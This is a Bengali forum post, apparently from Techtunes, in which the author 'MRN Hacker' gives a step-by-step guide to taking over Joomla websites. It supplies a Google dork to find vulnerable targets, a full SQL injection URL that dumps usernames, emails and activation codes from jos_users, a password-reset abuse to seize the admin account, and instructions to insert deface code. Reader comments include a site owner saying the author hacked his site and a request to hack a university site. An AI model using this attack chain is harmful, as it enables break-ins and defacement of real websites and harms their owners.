আমি MrNHaCkEr চলে আসলাম আপনাদের মাঝে ।।
আমি এবার দেখাব কিভাবে জুমলা সাইট হ্যাক করবেন ।। ইমেজ সহঃ
কথা না বারিয়ে দ্রুত কাজ সুরু করে দিয় ।
প্রথমে নিচের Google Dork টা দিয়ে গুগল এ সার্চ দিনঃ
inurl:”option=com_mytube”
গুগল আপনাকে অনেক সাইট আর সন্ধান দিবে । একটাকে লক্ষ বানিয়ে নিন ।
নিচের মত হবে সাইটটির এড্রেস ;
http://targetsite.com/index.php?option=com_mytube&Itemid=88…
এবার সাইট এর URL এর সাথে নিচের URL টি পরিবর্তন করুন –>
/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–
এই রকম হবে ঃ
যদি আপনার টার্গেট সাইট টি vulnerable হয় তাহলে নিচের মত দেখতে পাবেন পেজ টি তে –>
উপরে ইমেজ এ username, email and activation code <———-
এই পেজ টি ওপেন রেখে অন্য একতা ট্যাব ওপেন করুন –>
এবার সুধু সাইট টির এড্রেস টা নিয়ের নিচের মত URL এর শেষে নিচের URL টি পরিবর্তন করুনঃ —->
/index.php?option=com_user&view=reset
নিচের মতঃ ——>
http://www.targetsite.com/index.php?option=com_user&view=reset <————-
This is standard Joomla query for password reset request
এখানে আমরা উপরের যেই ইমেইল টা পেয়েসি সেই টা দিব —–>
এবার Submit করুন ।
এর পর Activation কোড টা Reset হয়ে যাবে । < যেই টা আমরা প্রথম ধাপ টা করে পেয়েসি >
প্রথম ট্যাব এ ফিরে আসুন যেই টা প্রথম ওপেন করে রেখে দিয়েসেন ।;
এবার পেজ টা একবার Refresh করুন ।
নতুন Activation code টা কপি করে Token এর ঘরে দিন , ইউজার নেম <এ প্রথম ট্যাব থেকে পাওয়া ইউজার নেম পাওয়া > নাম টা দিন ।
এই রকম activation code দেখলে তাহলে অন্য সাইট খুজুন -> $1$14411
যদি সব কিছু ঠিক থাকে তাহলে নিচের মত Password এর পেজ আসবে নতুন Password দিন ।
তার পর নিচের URL টা সাইট টার সাথে লাগিয়ে দিন ।।
administrator/
এই রকম ঃ
এবার ইউজার নেম এবং পাস দিয়ে লগ ইন করুন ।। ওয়াও !! গ্রেট ।
এবার Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save কাজ শেষ ।
বিদায় নিতে বাধ্য হলাম আরও কিছু লিখার ইচ্ছা ছিল পারলাম না ।।
সবার সুস্থ সুন্দর জীবন কামনা করি …। ।
MRN —>
আমি MRN Hacker। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 21 টি টিউন ও 160 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
ফালতু পোস্ট! আপনি যদি এতই বড় হ্যাকার হয়ে থাকেন, দেখি Youtube.com কে হ্যাক করেন। অপেন চ্যালেঞ্জ!!!
@ফাইয়াজ বিন সালাম: হাহাহহাহা !!!!@@@
কোন কারনে ফালতু সেইটা বলে যুক্তি দেখালে আক্তা কথা সিল ।।
আর আমার youtube কে হ্যাক করে কোন লাভ নেই ।।
ওপেন চ্যালেঞ্জ ? হাহাহ
যাই হক মন্তব্য পেয়েই খুসি হলাম ।।
ধন্যবাদ ভাই।।
@MRN Hacker
ভাইয়া, আপনার post টি অনেক সুন্দর হইছে। আমি এই sector এ নতুন। দয়া করে একটু বুঝিয়ে বলবেন কি GOOGLE DORKS and VULNERABLE site মানে কি?
হা MRN HACKER ভাই, apona k dhonnobad, ami anondito ebong dokhhito , ei jonno j aponi amar new site http://www.kendrabindo.com hack koresen. amar site ta ekdom new, matro kaj soro koresi, ekhono site design e kora hoy ni, othocho aponi ATACK korlen ama k, Ami Khosi hobo aponi Jodi amar Ei Site er bepare kotha balen 01558541325 eta amar number.
“www.ignou.ac.in” ei website haque kore amake pass korite parben ami ei university website tar chatro………
ধন্যবাদ ভাইয়া………। আমি ও এক জন হ্যাকার হতে চাই।।